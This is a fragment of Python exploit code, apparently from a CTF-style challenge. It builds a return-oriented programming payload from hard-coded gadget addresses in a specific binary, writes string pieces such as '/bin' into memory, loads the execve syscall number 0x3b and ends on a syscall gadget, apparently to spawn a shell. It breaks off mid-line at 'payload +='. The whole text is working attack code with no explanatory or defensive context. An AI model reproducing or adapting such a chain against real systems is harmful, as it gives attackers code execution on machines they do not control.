payload = p64(0x413a04)
#0x413a04: pop rbx ; retf
payload += p64(0x4017d1)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x45421d)+p64(0x401257)
# 0x401257: add eax, 0x52e2b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x413a04)
# 0x413a04: pop rbx ; retf
payload += p64(0x6e69622f)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4540ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x413a04)
# 0x413a04: pop rbx ; retf
payload += p64(0x68662f)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4540b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x454070)+p64(0x4261cd)
# 0x00000000004261cd: pop rcx; ret; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x454198)+p64(0x0)+p64(0x4260bf)
# 0x00000000004260bf: pop rax; or dh, bh; jmp qword ptr [rsi + 0x48]; 
payload += p64(0x3b)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x415989)
# 0x0000000000415989: mov edx, ecx; syscall; 
payload +=
